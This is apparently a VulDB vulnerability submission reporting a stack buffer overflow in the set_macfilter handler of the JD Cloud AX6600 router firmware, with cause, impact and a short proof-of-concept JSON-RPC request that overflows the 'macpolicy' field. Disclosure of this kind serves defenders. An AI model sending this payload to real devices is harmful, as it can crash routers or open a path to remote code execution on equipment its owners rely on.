| Titre | JD Cloud AX6600 JDCOS-4.5.3.r4546 Stack-based Buffer Overflow |
|---|
| Description | # Stack Overflow Vulnerability in the `set_macfilter` Function of JD Cloud AX6600
## Basic Information
- Vendor: JD Cloud
- Product: AX6600
- Firmware Version: JDCOS-4.5.3.r4546
- Firmware Release Date: 2026-01-22
## Vulnerability Description
A stack overflow vulnerability exists in the `set_macfilter` function of the `/sbin/jdcweb_rpc` binary in JD Cloud AX6600 JDCOS-4.5.3.r4546. An attacker can remotely trigger the vulnerability by sending a specially crafted request.
## Detailed Analysis
For the user-controlled `macpolicy` parameter in the input request, no length validation is performed before it is copied with `strcpy`, allowing data that exceeds the intended length limit to be written into stack variables.
PoC request
```
data = {
"jsonrpc": "2.0",
"id": 20,
"method": "call",
"params": [
"a36ecfc53949fb418f58023b69e924cc",
"jdcapi.static",
"set_macfilter",
{
"macpolicy": "A"*0x1000,
"enable": "0"
}
]
}
```
## Impact
- Stack Overflow
- May lead to:
- Device crash (DoS)
- Potential remote code execution (RCE)
|
|---|
| La source | ⚠️ http://cdn2.v50to.cc/JDcloud-AX6600_overflow.zip |
|---|
| Utilisateur | CookedMelon (UID 52513) |
|---|
| Soumission | 06/05/2026 08:41 (il y a 1 mois) |
|---|
| Modérer | 05/06/2026 20:40 (1 month later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 368970 [JingDong JD Cloud Box AX6600 4.5.3.r4546 /sbin/jdcweb_rpc set_macfilter buffer overflow] |
|---|
| Points | 17 |
|---|